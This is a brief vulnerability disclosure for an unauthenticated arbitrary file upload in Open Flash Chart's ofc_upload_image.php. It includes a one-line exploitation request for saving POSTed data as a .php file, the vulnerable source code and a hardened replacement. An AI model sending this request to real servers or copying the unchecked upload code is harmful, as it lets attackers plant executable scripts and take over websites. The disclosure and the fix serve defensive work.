Vulnerable file saves POST data as a file with an arbitrary extension

Vulnerable file: /chart/php-ofc-library/ofc_upload_image.php

Exploitation:
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php (hfy.php is the file name)

POST arbitrary data
Saved to: http://localhost/chart/tmp-upload-images/hfy.php

This is the vulnerable file from the latest version of wss; even the paid version has it. Seen on the demo deployed in the Sina store~

<?php

//
// In Open Flash Chart -> save_image debug mode, you
// will see the 'echo' text in a new window.
//

/*

print_r( $_GET );
print_r( $_POST );
print_r( $_FILES );

print_r( $GLOBALS );
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );

*/
// default path for the image to be stored //
$default_path = '../tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_GET[ 'name' ] );

echo 'Saving your image to: '. $destination;
// print_r( $_POST );
// print_r( $_SERVER );
// echo $HTTP_RAW_POST_DATA;

//
// POST data is usually string data, but we are passing a RAW .png
// so PHP is a bit confused and $_POST is empty. But it has saved
// the raw bits into $HTTP_RAW_POST_DATA
//

$jfh = fopen($destination, 'w') or die("can't open file");
fwrite($jfh, $HTTP_RAW_POST_DATA);
fclose($jfh);

//
// LOOK:
//
exit();
//
// PHP5:
//


// default path for the image to be stored //
$default_path = 'tmp-upload-images/';

if (!file_exists($default_path)) mkdir($default_path, 0777, true);

// full path to the saved image including filename //
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] );

// move the image into the specified directory //
if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {
    echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";
} else {
    echo "FILE UPLOAD FAILED";
}


?>

Fix:
This vulnerable file is simply a tragedy. How to deal with it: add an authorization check, validation of the extension and so on~ Do it yourself.
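
One way to apply the two checks named in the fix (authorization and extension validation) to the raw-POST branch, as an added example that is not code from the original post or from Open Flash Chart. The session key `user_id`, the 2 MiB limit, the allowed image types and the `reject()` helper are assumptions made for illustration.

```php
<?php
// Added example (PHP 7.1+), not Open Flash Chart code. Assumptions: the host
// application marks logged-in users with $_SESSION['user_id']; only PNG, JPEG
// and GIF are accepted; the 2 MiB limit is arbitrary.
session_start();

const MAX_BYTES = 2 * 1024 * 1024;
const ALLOWED = ['image/png' => 'png', 'image/jpeg' => 'jpg', 'image/gif' => 'gif'];

function reject(int $code, string $msg): void   // hypothetical helper
{
    http_response_code($code);
    exit($msg);
}

// 1. Authorization check: anonymous callers may not write files.
if (empty($_SESSION['user_id'])) {
    reject(403, 'Forbidden');
}
if ($_SERVER['REQUEST_METHOD'] !== 'POST') {
    reject(405, 'Method not allowed');
}

// 2. Read the raw body with a hard cap ($HTTP_RAW_POST_DATA is gone in PHP 7).
$data = stream_get_contents(fopen('php://input', 'rb'), MAX_BYTES + 1);
if ($data === false || $data === '' || strlen($data) > MAX_BYTES) {
    reject(400, 'Bad upload size');
}

// 3. Take the type from the content, never from the caller-supplied name.
$info = @getimagesizefromstring($data);
$ext = ALLOWED[$info['mime'] ?? ''] ?? null;
if ($ext === null) {
    reject(415, 'Not an allowed image type');
}

// 4. Server-generated name and server-chosen extension; ?name= is ignored.
$dir = __DIR__ . '/../tmp-upload-images/';
if (!is_dir($dir) && !mkdir($dir, 0750, true)) {
    reject(500, 'Storage unavailable');
}
$name = bin2hex(random_bytes(16)) . '.' . $ext;

// 'x' mode refuses to overwrite an existing file.
$fh = fopen($dir . $name, 'xb');
if ($fh === false) {
    reject(500, 'Cannot create file');
}
fwrite($fh, $data);
fclose($fh);
echo 'Saved as: ' . $name;
```

Because `getimagesizefromstring()` only inspects the image header, the upload directory should also be configured on the web server so that nothing in it is executed as a script.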